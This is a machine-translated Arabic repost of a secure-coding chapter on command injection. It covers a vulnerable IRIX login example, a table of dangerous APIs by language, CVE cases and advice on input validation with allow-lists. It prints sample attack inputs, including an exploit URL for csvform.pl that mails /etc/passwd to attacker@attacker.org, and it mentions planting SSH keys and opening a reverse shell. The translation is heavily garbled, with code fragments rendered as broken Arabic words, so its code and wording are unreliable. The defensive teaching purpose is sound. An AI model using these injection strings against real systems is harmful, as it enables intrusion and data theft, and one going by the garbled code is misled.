القيادة حقن

في عام 1994 ، وصاحب هذا البرنامج التعليمي كان جالسا امام احد sgi الحاسوب بالظهور ايركس هو ببساطة ان تظهر شاشة تسجيل الدخول. فهو يعطى الخيار لطباعة بعض الوثائق وتحديد الطابعه لاستخدامها. المؤلف تصوره لتنفيذ ما قد يكون ، المحدد سلسلة فعلا ان لم يشر الى الطابعه ، وفجاه كان مدير نافذة على المربع المؤلف ليس فقط لم يكن من المفترض ان يكون الوصول الى ، ولكن ايضا لم يكن حتى تسجل دخولك الى.

المشكلة هي القيادة حقن الهجوم ، حيث مدخلات المستخدم الذي كان القصد منه ان يكون فعلا بيانات جزئية يمكن تفسيرها على انها قيادة من نوع ما. في كثير من الاحيان ، ان القيادة يمكن ان يعطي الشخص مع سيطره للوصول الى البيانات والوصول الى اكبر بكثير مما كان يقصد من اي وقت مضى.

أثرت اللغات

القيادة حقن تمثل مشاكل تقلق في اي وقت اوامر وبيانات وتوضع انلاين معا. في حين ان اللغات يمكن ان يتخلص من بعض اهم المعالم حقن قيادة الهجمات عن طريق توفير وصلات جيدة تطبيق البرمجه (ابيس) ان أداء السليم لإثبات المدخلات ، وهناك دائما امكانيه ان ابيس الجديد سيعرض انواع جديدة من حقن قيادة الهجمات.

واوضح الذنب

القيادة حقن تحدث المشاكل عندما وضعت بيانات غير موثوق فيه البيانات الى أن ينتقل الى نوع من المطيع او المترجم ، حيث قد البيانات ، لو كان مهيأ في طريقة معينة ، ان تعامل على انها شيء بخلاف البيانات.

فان الكنسي مثلا لهذه المشكلة كانت دائما تدعو API مباشرة ان نسميه نظام القيادة مترجم دون اي المصادقه عليها. على سبيل المثال ، تسجيل الدخول القديمة ايركس الشاشه (المذكورة سابقا) كانت تفعل شيئا على غرار ما يلي :

  تشار buf [1024] ؛ Snprintf (buf ، "نظام مرشحا ف - ٪ s" ، user_input ، sizeof (buf) -1) ؛ نظام (buf) ؛

وفي هذه الحاله ، كان المستخدم غير صاحب امتيازات ، لانه يمكن ان يكون أي شخص على الاطلاق تجول بها محطات عمل. ومع ذلك ، ببساطة بكتابه النص : فريد ؛ & إكس تيرم ، أ طرفيه البوب سوف يصل ، لان ؛ من شأنه ان ينهي الاصل القيادة في نظام شل ؛ واكس تيرم القيادة من شأنه ان يخلق ككل محطة جديدة نافذة على استعداد للاوامر ، مع & نقول للنظام لإدارة العملية دون عرقلة العملية الحالية. (في ويندوز قذيفه ، و metacharacter الافعال نفسها بوصفها منقوطه على المربع يونيكس.) ونظرا لأن عملية تسجيل الدخول قد الاداريه الامتيازات ، وهي المحطة التي انشئت من شأنه ايضا ان الامتيازات الاداريه!

وهناك الكثير من المهام عبر العديد من اللغات التي هي عرضة لمثل هذه الهجمات ، كما سترى في وقت لاحق. ولكن ، قيادة وحقن الهجوم لا يحتاج الى الوظيفة التي تدعو الى نظام شل. فعلى سبيل المثال ، المهاجم قد تكون قادرة على التأثير نداء الى لغة المترجم. هذه هي جميلة الشعبية رفيعة المستوى في لغات مثل بيرل وبايثون. على سبيل المثال ، ان تنظر في الامور التالية البيثون المدونه :

  اسطوانة call_func (user_input ، system_data) : اكسيك 'special_function_ ٪ s)" ٪ s ")' ٪ (system_data ، user_input

في السابق ، وقانون البيثون ٪ مشغل الأفعال بشكل يشبه * printf specifiers في المباراة جيم - انهم حتى في القيم بين قوسين مع ٪ s القيم في الخيط. وكنتيجه لذلك ، هذا القانون يقصد الكلمه دالة الذي اختاره النظام ، ويمر عليه الحجه من المستخدم. فعلى سبيل المثال ، اذا كانت العينه system_data user_input وكانت فريد ، البيثون يتعارض مع هذا القانون على انه :

  Special_function_sample ( "فريد")

و، هذا القانون من شأنه ان يتعارض في نفس نطاق اكسيك ان البيان هو الدخول.

User_input مراقبة المهاجمين الذين يمكن ان تعدم اي قانون يريدون البيثون مع تلك العملية ، ببساطة باضافه اقتبس ، تليها الحق بين قوسين وفاصله منقوطه. فعلى سبيل المثال ، يمكن ان المهاجم حاول الخيط :

  فريد ") ؛ المطبوعه ( "فو

هذا سيتسبب في وظيفة لتشغيل الشفره التالية :

  Special_function_sample ( "فريد") ؛ المطبوعه ( "فو")

وهذا لن يفعل ما يقصد مبرمج ، لكنها ستكون ايضا المطبوعه فو. المهاجمون حرفيا يمكن ان نفعل شيئا هنا ، بما في محو الملفات مع مميزات البرنامج ، أو حتى تقديم وصلات شبكيه. واذا كان هذا يعطي المرونة المهاجمين الحصول على امتيازات اكثر مما كان خلاف ذلك ، وهذه هي مشكلة أمنية.

وكثير من هذه المشاكل التي تحدث عند مراقبة التركيبات والبيانات مصفف ، والمهاجمون يمكن استخدام طابع خاص لتغيير سياق عودة الى مراقبة التركيبات. وفي حالة القيادة قذائف ، وهناك العديد من الحروف السحريه التي يمكن ان تفعل هذا. على سبيل المثال ، على غرار معظم يونيكس - آلات ، واذا اضيف الى المهاجمين فاصله منقوطه (الذي ينتهي في بيان) ، backtick (البيانات بين backticks يحصل كما اعدم المدونه) ، أو عمودي بار (كل شيء بعد بار يعامل باعتباره آخر ، العملية ذات الصلة) ، وانهم قد يتعارض مع اوامر تعسفيه. هناك حروف خاصة اخرى يمكن ان تغير من سياق البيانات لمراقبة ؛ هذه مجرد الاكثر وضوحا.

تقنيه مشتركة واحدة للتخفيف من المشاكل مع أدارة الاوامر هو استخدام عنصر API الدعوة إلى القيادة مباشرة ، دون المرور عبر قذيفه. على سبيل المثال ، على يونيكس الإطار ، فإن هناك execv () من وظائف الاسرة ، والقفزات التي شل ويدعو البرنامج مباشرة ، واعطاء الحجج كما الخيوط.

هذا امر جيد ، ولكنه لا يحل المشكلة دائما ، وخاصة لأن أفرخ البرنامج قد وضع نفسه الحق في البيانات القادمة الى مهمة مراقبة التركيبات. على سبيل المثال ، داعيا الى execv () على ان البرنامج البيثون ثم يمر الحجه قائمة على وجود اكسيك سيكون سيئا. لدينا حتى ينظر الى الحالات التي يكون فيها الشعب execv () 'د / بن / ش (القيادة شل) ، والذي يغفل هذه النقطه تماما.

المتصله الذنوب

عدد قليل من خطايا يمكن النظر اليها على انها انواع محددة من القيادة حقن المشاكل. لغة الاستعلامات البنيويه حقن ومن الواضح ان نوعية محددة من القيادة حقن الهجوم. شكل سلسلة المشاكل التي يمكن ان ينظر اليها على انها نوع من القيادة حقن مشكلة ايضا. وذلك لأن المهاجم ان يأخذ بقيمة المبرمج يتوقع ان تكون البيانات ، ثم الملاحق وقراءة وكتابة الأوامر (على سبيل المثال ، ن ٪ الموصف هو الكتابة القيادة). ولا سيما تلك الحالات هي مشتركة حتى ان ننتهي من تعامل كل منهما على حدة.

وهذا ايضا هو لب المشكلة في الموقع عبر كتابه ، حيث يمكن ان المهاجمين اختاروا البيانات التي تبدو وكأنها لا سيما شبكة مراقبة العناصر اذا ان هذه البيانات ليست سليم صادق.

اكتشاف الذنب نمط

هنا هي العناصر الى النمط :

الاوامر (أو السيطرة على المعلومات (بيانات ويقعان انلاين المقبل لبعضها البعض.
وهناك امكانيه ان بعض البيانات قد احصل يعامل باعتباره القيادة ، في كثير من الاحيان بسبب الحروف مع المعاني الخاصة ، مثل الأقوال الماثوره والفوارز المنقوطه.
السيطرة على اوامر من شأنه ان يعطي المستخدمين امتيازات اكثر مما لديها بالفعل.

اكتشاف الذنب خلال استعراض مدونة

وهناك العديد من API يدعو والتركيبات اللغويه عبر طائفة واسعة من مختلف لغات البرمجه التي هي عرضة لهذه المشكلة. نهجا جيدا لاعادة النظر في قانون لهذه المشكلة هو اولا تحديد كل بناء ويمكن ان تستخدم لتتذرع بأي نوع من القيادة المعالج (بما في القيادة قذائف ، وقاعدة بيانات ، أو مترجم لغة البرمجه ذاتها). ثم ، ان ننظر من خلال هذا البرنامج لنرى ما اذا كان اي من تلك التركيبات تكون قد استخدمت فعلا. اذا كان الأمر كذلك ، ثم فحص لمعرفة ما اذا كان مناسبا تدبير دفاعي هو اتخاذها. بينما يمكن ان تتفاوت تدابير دفاعية تستند الى الخطيئة ، وعادة ما ينبغي لاحد ان ينكر ان يكون للمشكك - قائمة النهج القائمة ، والسماح لصالح قائمة النهج (انظر "خطوات الخلاص" ان القسم التالي).

وها هي بعض من اكثر شعبية بتشييد ان نشعر بالقلق ازاء ما يلي :

اللغة	بناء	تعليقات
ج / ج + +	نظام () ، popen () ، Execlp () ، execvp ()	Posix
ج / ج + +	فان shellexecute الاسرة () من مهام ؛ _wsystem ()	Win32 فقط
بيرل	نظام	واذا ما دعا احد حجة ، يمكن الكلمه الوعاء اذا كان الخيط له شل metacharacters.
بيرل	اكسيك	الى نظام مماثل ، باستثناء الغايات فان بيرل العملية.
بيرل	Backticks ( ')	عموما سوف تحتج قذيفه.
بيرل	مفتوح	واذا كان الطابع الاولى او الاخيرة من اسم الملف هو الراسي بار ، ثم بيرل يفتح أنبوب بدلا من ذلك. ويتم ذلك عن طريق نداء الى شل ، وبقية من اسم الملف تصبح البيانات مرت عبر شركة شل.
بيرل	الراسي بار المشغل	هذه الافعال تماما مثل posix Popen () الكلمه.
بيرل	التقييم	يقيم الخيط الحجه كما بيرل المدونه.
بيرل	التعبير العاديه / ه المشغل	يقيم نمطا المطابقه جزء من سلسلة النحو بيرل المدونه.
بايثون	اكسيك ، التقييم	كما يحصل على تقييم البيانات المدونه.
بايثون	Os.system ، os.popen	هذه مندوب لالكامنة posix يدعو.
بايثون	Execfile	هذا هو مماثل لاكسيك والتقييم ، ولكن يأخذ بيانات لتشغيلها من الملف المحدد. اذا كان المهاجم يمكن ان تؤثر على مضمون الملف ، ويحدث نفس المشكلة.
بايثون	مدخلات	تعادل التقييم (raw_input ()) ، بحيث ينفذ هذا فعلا للمستخدم كما نص قانون!
بايثون	اجمع	القصد من جمع النص في القانون هو في الظاهر انه للحصول على الذهاب الى البعيد!
جافا	Class.forname (الخيط الاسم) ، class.newinstance ()	جاوة البايت المدونه ديناميكيه يمكن تحميلها والبعيد. وفي بعض الحالات ، المدونه ستكون sandboxed عندما تأتي من غير موثوق فيه المستخدم (وخاصة عند كتابة برنامج صغير).
جافا	Runtime.exec ()	جاوة حاولت أن تفعل شيئا وآمنا به عدم الادلاء بأي المباشر مرفق الدعوة الى شل. ولكن قذائف مريحه بحيث يمكن لبعض المهام الى ان العديد من الاشخاص سوف نطلق على هذا مع حجة تتذرع صراحة ان شركة شل.

تقنيات الاختبار لايجاد الذنب

عموما ، فان ما ينبغي عمله هو اتخاذ كل المدخلات ، ويفكر في ما هو نوع القيادة شل انها يمكن ان أحصل على الفرار الى مرت ، ثم حاول الالتصاق في كل metacharacter لان شركة شل ، وترى اذا ما كانت تصل ضربات. وبطبيعة الحال ، وانك تريد ان تختار المدخلات في شكل ، واذا metacharacter الاشغال ، يمكن قياسها شيء سوف يحدث فعلا.

فعلى سبيل المثال ، إذا اردت اختبار لمعرفة ما اذا كانت البيانات هي مرت الى شل يونيكس ، اضافة فاصله منقوطه ، وبعد ذلك نحاول البريد نفسك شيئا. ولكن ، إذا كانت البيانات يوضع داخل ونقلت والخيط ، انك قد تضاف الى حد اقتبس للخروج من هناك. لتغطية هذا ، أنك قد تكون اختبارا ان تدرج اقتبس يليها فاصله منقوطه ، ثم ان القيادة البريد نفسك شيئا. الشيك اذا كان تحطم او هل الاشياء السيءه الاخرى ، وكذلك اذا كنت احصل على البريد الألكتروني ؛ اختبارك القضية قد لا تؤدي بالضبط تسلسل الهجوم ، لكنها قد تكون قريبة بما فيه الكفايه انه لا يزال يمكن ان تكشف هذه المشكلة. وفي حين ان هناك الكثير من دفاعات ممكن ، في الممارسه ، على الارجح انك لن تحتاج الى الحصول ايضا الهوى. انت يمكن ان تخلق عادة بسيطة البرنامج ان يخلق عددا من التقليب من مختلف metacharacters (مراقبة الحروف التي من المعاني الخاصة ، مثل ؛) والاوامر ، الى ارسال تلك المدخلات المختلفة ، ونرى ما اذا كان شيئا نتائج معاكسه.

ادوات من الشركات مثل SPI ديناميات وwatchfire مكننه هذا النوع من التجارب لتطبيقات شبكة الانترنت.

مثلا ذنوب

البنود التالية المشتركة على مواطن الضعف والتعرض (cve) على الشبكه العالمية (http://cve.mitre.org) هي امثلة على حقن قيادة الهجمات.

يمكن - 2001 - 1187

فان csvform بيرل بوابة وصلة مشتركة (CGI) النصي يضيف فاصله الى السجلات - فصل قيمة (csv.) ملف قاعدة البيانات. Omnihttpd 2.07 ملقم الويب السفن مع السكريبت دعا statsconfig.pl. بعد الاستفسار هو معرب ، اسم الملف (مرت في ملف بارامتر) لا تحصل مرت على الشفره التالية :

  Modify_csv الفرعية (اذا (فتح) csv. ، $ _ [0])) (...)

لا يوجد اثبات المدخلات عمله على اسم الملف ، اما. بحيث يمكنك استعمال خدعة قاسيه من الانابيب اضافة الى نهاية اسم الملف.

مثال على استغلال ستتألف من زيارة هذا العنوان :

  Http://www.example.com/cgi-bin/csvform.pl؟file=mail ٪ 20attacker@attacker.org </ الخ / passwd |

على نظام يونيكس ، وهذا سوف البريد الالكتروني كلمة السر ملف النظام الى المهاجم.

علما ان 20 ٪ هو عنوان الموقع - الفضاءيه المشفره. فان فك يحصل عليه القيام به قبل CGI النصي يحصل اجتاز البيانات.

مثال استغلال نعطي ليست مثيرة للاهتمام أن جميع هذه الأيام ، لان كلمة السر يونيكس الملف ولا يعطي سوى اسماء المستخدمين. ومن المحتمل ان تقرر المهاجمين الى القيام باي شيء بدلا من شأنها ان تسمح لهم بتسجيل الدخول ، مثل كتابة المفتاح العمومي ل~ /.ssh / authorized_keys. او ، ان المهاجمين يمكن ان تؤدي فعلا الى استخدام كل هذا الى تحميل وتشغيل اي برنامج يريدون به كتابه الى ملف بايت. ومن الواضح منذ بيرل تركيبها بالفعل على اي ادارة هذا الصندوق ، واضحة الشيء سيكون لكتابة بسيطة بيرل النصي لربط عودة الى المهاجم ، وعلى الخصوص ، واعطاء المهاجم قيادة شل.

يمكن - 2002 - 0652

فان ايركس الملف المتصاعده نظام الخدمة تسمح للنظام الناءيه الملف المتصاعده على مدى يدعو للجنة الحمايه من الاشعاع ، وعموما ركبت بشكل افتراضي. وتبين انه ، حتى البقه تم العثور عليها فى عام 2002 ، العديد من الملف ان خادم الشيكات اللازمة لجعل عندما تلقى طلب الناءيه نفذت باستخدام popen () لتشغيل الاوامر من سطر الاوامر. المعلومات المستخدمة في ان الكلمه كانت ماخوذه مباشرة من المستخدمين عن بعد ، وبشكل جيد وضعت الفاصله المنقوطه في بارامتر ستسمح للجنة الحمايه من الاشعاع المهاجم لادارة شركة شل الاوامر كما الجذريه على المربع.

خطوات الخلاص

الواضح ما ينبغي عمله هو ان تحتج أبدا قيادة مترجم من اي نوع. ولكن ، ان لا يكون دائما عمليا ، وخصوصا عند استخدام قاعدة بيانات. وبالمثل ، وسيكون من المفيد للتو نحو ما أقول ان تفعل اذا كنت قد تستخدم شل القيادة ، لا يستخدم اى بيانات خارجية في آن. انه ليس مجرد تقديم المشوره العملية في معظم الحالات.

الجواب الوحيد الجدير بالاهتمام هو ان تفعل المصادقه عليها. الطريق الى الخلاص هو بسيط جدا هنا :

مراجعة البيانات للتأكد من انها اوكيه.
يتخذ الاجراء المناسب الذي تكون فيه البيانات غير صالحة.

التأكد من صحه البيانات

على أعلى مستوى ، لديك خيارين. يمكنك إما إثبات صحه كل ما كنت الذهاب الى سفينة قبالة لعملية خارجي ، او يمكنك فقط للمصادقة على الاجزاء التي هي مدخلات من مصادر غير موثوق فيه. اما احد بخير ، طالما انك شامل حول هذا الموضوع.

ومن عادة فكرة جيدة لاثبات صحه البيانات الخارجية حق امامكم استخدامها. هناك بضعة أسباب لذلك. اولا ، ويضمن ان يحصل على البيانات بحث عن بيانات كل الطريق المءديه الى ان استخدام. ثانيا ، دلاليه للبيانات في كثير من الاحيان افضل من المفهوم الحق قبل استخدام البيانات. وهذا ما يتيح لك ان تكون دقيقة قدر الامكان مع مراجعات التحقق من المدخلات الخاصة بك. كما هو جيد للدفاع ضد امكانيه البيانات يجري تعديل في طريقة سيئة بعد الشيك.

ولكن في النهاية ، للدفاع في العمق هو أفضل استراتيجية هنا. وهي ايضا جيدة للتحقق من البيانات انها تأتي في ذلك انه لا يوجد خطر من ان تستخدم في مكان آخر دون تفتيشها. ولا سيما اذا كانت هناك الكثير من الاماكن التي تنشط فيها البيانات يمكن ان يساء استعمالها ، وأنه قد يكون من السهل التغاضي عن شيك في بعض الاماكن.

وهناك ثلاث طرق لتحديد بارز صحه البيانات :

فإن انكار - قائمة النهج نظرتم للمباريات مما يدل على أن البيانات غير صحيح ، ويقبل كل شيء آخر كما صحيحة.
فإن سماح - قائمة النهج نظرتم لصالحه مجموعة من البيانات ، ونرفض اي شيء آخر (حتى لو كانت هناك فرصة للبعض انها ليست إشكالية).
"نقلا عن" نهج لكم تحويل البيانات بحيث لا يمكن ان يكون هناك اي شيء غير مامونه.

كل من هذه النهج عيب انك قد ننسى شيئا هاما. وفي حالة انكار - ونقلا عن القوائم ، ومن الواضح ان هذا يمكن ان يكون سيئا الآثار الامنية. في الواقع ، انه من غير المرجح ان you'll ينتهي مع تأمين البرمجيات باستخدام ينكر - قائمة النهج اذا كنت بتمرير البيانات الى بعض أنواع النظم (مثل قذيفه) ، ولأن قائمة الشخصيات التي يمكن ان يكون لها معنى خاص هو فعلا تستغرق وقتا طويلا. بالنسبة لبعض النظم ، وعادل عن اي شيء آخر سوى رسائل وأرقام يمكن أن يكون لها معنى خاص. نقلا ايضا اصعب بكثير من يمكن للمرء ان يفكر. فعلى سبيل المثال ، عندما واحد هو الكتابة المدونه ان يؤدي نقلا عن بعض انواع المعالجات القيادة ، فهو مشترك لاتخاذ سلسلة ، والعصا في يقتبس. اذا كنت غير دقيق ، يمكن ان المهاجمين عادل رمي الخاصة بهم ويقتبس في هناك. و، مع بعض القيادة المجهزين ، بل هناك metacharacters ان يكون له معنى الا داخل نقلت الخيط (وهذا يشمل يونيكس القيادة قذائف).

لإعطاءك الإحساس مدى صعوبة يمكن ، يحاول أن يكتب اسفل كل يونيكس شل metacharacter بنفسك. وتشمل كل ما يمكن ان يؤخذ على انه مراقبة ، بدلا من البيانات. كيف الكبرى هي قاءمتك؟

قائمتنا تضم كل قطعة من علامات الترقيم الا @ ، _ ، + ، : ، والفاصله. ونحن مسرورون ليست متاكده من ان تلك الاحرف عالميا الامنه. قد تكون هناك قذائف حيث لا ناشرا.

يمكنك ان تفكر لديك بعض الشخصيات الاخرى التي لا يمكن ابدا ان تفسر معنى خاصا. وتعني علامة ناقص؟ قد تفسر على انها علامة على بداية لقيادة خط الخيار لو كان في بداية كلمة واحدة. كيف عن القيراط (^)؟ هل تعرف انه لا بدائل؟ كيف ازاء ٪ علامة؟ وفي حين انه قد يكون في كثير من الاحيان غير مءذيه عندما تفسر على انها metacharacter ، وهو metacharacter في بعض الظروف ، لأنها وظيفة المراقبة. التلده (~) هي مماثلة في انه سيكون ، في بعض السيناريوهات ، لتوسيع نطاق المنزل دليل المستخدم لو كان في بداية كلمة ، ولكن على خلاف ذلك فإنه لن يعتبر metacharacter. انه يمكن أن يكون تسرب المعلومات او ما هو أسوأ ، لا سيما اذا كان واسطة لرؤية جزء من نظام ملف ان هذا البرنامج لا ينبغي ان نكون قادرين على رؤية. على سبيل المثال ، انت قد العصا الخاصة بك في برنامج / الوطن / بلاه / التطبيق ، وبعد ذلك ارفض نقاط ضعف في الخيط. ولكن قد يكون المستخدم قادرا على الحصول على أي شيء في / الوطن / بلاه عادل عن طريق التقديم مع ~ بلاه.

الاحواز حتى يمكن السيطرة على الحروف ، لأنها تستخدم لدلاليا منفصلة بين الحجج او الاوامر. وهناك انواع عديدة من الاحواز مع هذا السلوك ، بما في الاسعار ، وخطوط جديدة ، وعائدات النقل ، شكل طعامهم ، والراسي علامات التبويب.

زائد ، ولا يمكن ان يكون هناك مراقبة شخصيات مثل السيطرة د - ولاغ الطابع يمكن ان يكون لها آثار غير مرغوب فيها.

ومجمل القول ، انه من الاسهل بكثير استخدام احد سماح - قائمة. اذا كنت الذهاب الى استخدام أ - قائمة تنكر ، كنت افضل ان يكون بشكل لا يصدق يقين انك تغطي كل ما تبذلونه من القواعد. ولكن ، تسمح - القوائم وحدها قد لا يكون كافيا. التعليم هو بالتأكيد ضروريه ، لانه حتى اذا كنت تستخدم اي سماح - قائمة ، قد يسمح لك فراغات او علامات التلده دون ادراك ما يمكن ان يحدث في البرنامج الخاص بك من منظور أمني.

وثمة مسألة اخرى مع السماح - القوائم هو ان يتوفر لك التعيس المستخدمين لأن المدخلات التي ينبغي ان يسمح ليست كذلك. على سبيل المثال ، قد لا يسمح لك "+" في عنوان البريد الألكتروني ، ولكن العثور على مثل الناس الذين يستخدمونها لأنها تفرق الذين ناشرا على اعطاء عنوان البريد الالكتروني ل. ومع ذلك ، تسمح - قائمة النهج هو الأفضل بقوة الى اخرى بين النهجين.

تنظر وإذا كنت تأخذ قيمتها من المستخدم ان you'll يعامل بوصفه اسم الملف. دعونا نقول لكم ان تفعل المصادقه على هذا النحو (في هذا المثال هو البيثون) :

  لتشار في اسم الملف : اذا (لا تشار في string.ascii_letters وليس في string.digits وشار شار <> '.'):رفع" inputvalidationerror "

وهذا يتيح فترات بحيث يستطيع المستخدم في نوع الملفات مع التمديدات ، ولكن نسي عن التأكيد ، وهو امر شائع. ولكن ، مع ان ينكر - قائمة النهج ، الذي قد لا يكون لك التفكير الى ان يرفض القطع ، والذي سيكون سيئا ؛ وهو مهاجم يمكن استخدامها بالاضافة الى نقاط الوصول الى الملفات في اماكن اخرى على نظام ملفات ، وراء الدليل الحالي. مع نقلا عن النهج ، وقد عملتم على كتابة اكثر تعقيدا بكثير تحليل الروتيني.

انها شاءعه الاستخدام العاديه تعبيرات لأداء هذا النوع من التجارب. التعابير العاديه هي سهلة للحصول على خطأ ، ومع ذلك ، لا سيما عندما تصبح معقدة. اذا كنت ترغب في التعامل مع متداخل وهذه التركيبات ، وتناسى عن ذلك.

عموما ، من الامن وترى ان من الأفضل ان يكون آمنا من أسف. العاديه باستخدام عبارات يمكن ان يؤدي الى سهولة بدلا من الممارسات الامنه ، وبخاصه عندما تكون معظم عمليات تفتيش دقيقة تتطلب التدقيق في معاني المفردات أكثر تعقيدا من مجرد نمط المباراة.

عندما يفشل شيك

وهناك ثلاث استراتيجيات عامة للتعامل مع الفشل. انهم لا ناشرا حتى متنافيين. انه من الجيد دائما الى القيام على الاقل الاولين :

اشارة خطأ (وبالطبع ، رفض ان يدير القيادة - كما هو). نكون حذرين كيف لكم تقرير الخطأ ، ولكن. اذا كنت مجرد نسخة السيءه البيانات الى الوراء ، يمكن أن تصبح اساسا لكتابة عبر موقع الهجوم. انتم ايضا لا اريد ان اعطي المهاجم على معلومات اكثر مما ينبغي (وخاصة اذا تم التحقق من الاستخدامات التي تسبق تشكيل الوقت البيانات) ، حتى انها في بعض الاحيان على جائزة افضل لأقول ببساطة "على حرف غير صالح" او غيرها من بعض الغموض استجابة.
سجل الخطأ ، بما في ذلك جميع البيانات ذات الصلة. كن حذرا بأن عملية قطع الاشجار في حد ذاته لا تصبح نقطة الهجوم ؛ بعض قطع الاشجار نظم تقبل تهيئة حرفا ، ويحاول بسذاجه سجل بعض البيانات (مثل النقل والعودة linefeeds) يمكن ان ينتهي التحريف سجل.
تعديل البيانات لتكون صالحة ، واما الاستعاضه عنه القيم الافتراضيه او تحوله.

نحن لا يوصى عموما الخيار الثالث. ليس فقط يمكن ان تدلوا خطأ ، ولكن أيضا عندما كنت لا تجعل من الخطأ ، ولكن هل المستعمل ، ودلاليه يمكن ان تكون غير متوقعة. فمن الاسهل ببساطة تفشل ، والقيام بذلك بامان.

تدابير دفاعية اضافية

اذا كنت يحدث ان يكون باستخدام بيرل ، لغة المرافق اللازمة لمساعدتك على كشف هذا النوع من الخطأ في الوقت البعيد. انه يدعى العيب واسطة. الفكره الاساسية هي ان بيرل لن أدع لكم unsanitized ارسال البيانات الى واحدة من المهام سيئة اعلاه. ولكن ، الفحص العيب الوحيد في طريقة العمل ، بحيث لا ينفع لك اذا كنت لا تنقطع. زائد ، يمكنك عرضا لبرنامج الامم المتحدة العيب البيانات دون حقا لها المصادق عليها اي شيء. وهناك قيود اخرى ثانويه ، ايضا ، ولذا فمن الجيد ليس الاعتماد فقط على هذه الاليه. ومع ذلك ، فهي ما زالت اداة اختبار كبير ، وعادة ما قيمته انتقل علي كواحد من الدفوع الخاصة بك.

لAPI مشترك يدعو الى ان تتذرع القيادة المجهزين ، فقد تريدها ان اكتب بنفسك الغلاف API لهم ان لا تسمح - قائمة الترشيح ، والرميات استثناء الا اذا المدخلات هو سيئ. هذا لا ينبغي ان يكون فقط لاثبات المدخلات تعملون لأن ، في كثير من الأحيان ، ان من الافضل لاداء اكثر تفصيلا التعقل الشيكات على قيم البيانات. ولكن ، انها جيدة خط الدفاع الاول ، والمساله سهلة لانفاذ. يمكنك اما جعل الاغلفه يستعاض عن "سيئة" وظائف ، او يمكنك استخدام أداة البحث البسيط في مراجعة مدونة لكي تجد كل الحالات انت ضيعت وسرعان ما جعل الحق في الاستبدال.

الاستنتاجات

هل تؤدي المدخلات المصادقه على جميع مدخلات قبل ان يمر على القيادة المعالج.
هل الفشل في التعامل بشكل آمن اذا كان لاثبات المدخلات الشيك يفشل.
لا يجتاز unvalidated مدخلات لقيادة أي معالج ، حتى اذا كان القصد هو ان المساهمة سوف تكون مجرد بيانات.
لا تلجأ الى انكار - قائمة النهج ، الا اذا انت متأكد 100 ٪ انت المحاسبه لجميع الاحتمالات.
تنظر تجنب التعبيرات العاديه لاثبات المدخلات ؛ وبدلا من ذلك ، اكتب بسيطة وواضحه من قبل validators هان

هذا هو مقال اضافها هندرا فانغ

تنصل : موقعنا ليست مسؤولة عن المعلومات الواردة في هذه المادة. هذه المادة ولا يعبر باي حال عن آراء ، آراء ، والافكار او المعتقدات من المواد دليل الموظفين.

ترجمة أشعار : المادة "القيادة حقن" وقد ترجم تستخدم مشغل داءره الترجمة. ونحن نعتذر عن اي باخلاص اخطاء الترجمة التي وقعت. شكرا للتفاهم.